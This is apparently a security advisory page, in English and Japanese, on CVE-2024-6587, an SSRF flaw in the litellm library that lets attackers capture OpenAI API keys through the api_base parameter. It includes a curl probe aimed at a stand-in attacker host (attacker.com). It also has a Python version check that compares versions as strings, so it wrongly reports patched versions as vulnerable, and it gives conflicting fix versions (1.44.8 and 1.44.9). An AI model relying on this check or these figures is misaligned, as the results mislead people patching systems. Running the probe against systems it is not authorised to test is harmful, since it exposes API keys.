1.44.9
1.44.8
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the berriai/litellm Python library, specifically impacting versions up to 1.9.dev0. This flaw allows attackers to potentially intercept sensitive information, such as OpenAI API keys. The vulnerability arises from improper handling of the api_base parameter within the /chat/completions endpoint. A fix is available in version 1.44.8.
The SSRF vulnerability in litellm allows an attacker to control the destination of requests made by the application. By manipulating the api_base parameter in the /chat/completions endpoint, an attacker can redirect requests to a server they control. Crucially, these requests include the OpenAI API key used by litellm. This enables the attacker to intercept the API key, effectively gaining unauthorized access to the OpenAI API and potentially performing actions on behalf of the application user. The blast radius extends to any data processed through the OpenAI API, and the attacker could leverage the compromised API key for malicious purposes, such as data exfiltration or unauthorized model usage.
This vulnerability is publicly known and documented in the CVE database. While no active exploitation campaigns have been definitively linked to CVE-2024-6587 at the time of writing, the SSRF nature of the vulnerability makes it a potential target for opportunistic attackers. Public proof-of-concept (POC) code is likely to emerge, increasing the risk of exploitation. The vulnerability was published on 2024-09-13.
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
エクスプロイト状況
EPSS
88.37% (99% パーセンタイル)
CISA SSVC
CVSS ベクトル
The primary mitigation for CVE-2024-6587 is to upgrade to version 1.44.8 or later of the litellm library. If an immediate upgrade is not feasible due to compatibility issues, consider implementing input validation on the apibase parameter to restrict allowed domains. A Web Application Firewall (WAF) could be configured to block requests with suspicious apibase values. Monitor application logs for unusual outbound requests to unexpected domains, particularly those involving API key transmission. After upgrading, confirm the fix by attempting to trigger the SSRF vulnerability with a controlled api_base value and verifying that the request is blocked or redirected as expected.
litellm ライブラリをバージョン 1.44.9 以降にアップデートしてください。これにより、悪意のあるユーザーが OpenAI API キーを傍受できる SSRF 脆弱性が修正されます。`pip install --upgrade litellm` を実行して最新バージョンにアップデートしてください。
脆弱性分析と重要アラートをメールでお届けします。
CVE-2024-6587 is a Server-Side Request Forgery (SSRF) vulnerability in the berriai/litellm Python library, allowing attackers to intercept OpenAI API keys.
You are affected if you are using litellm version 1.9.dev0 or earlier. Upgrade to 1.44.8 or later to mitigate the risk.
Upgrade to version 1.44.8 or later of the litellm library. Consider input validation and WAF rules as temporary workarounds.
While no confirmed active exploitation campaigns are known, the SSRF nature of the vulnerability makes it a potential target.
Refer to the litellm project's repository and associated security advisories for the most up-to-date information.
requirements.txt ファイルをアップロードすると、影響の有無を即座にお知らせします。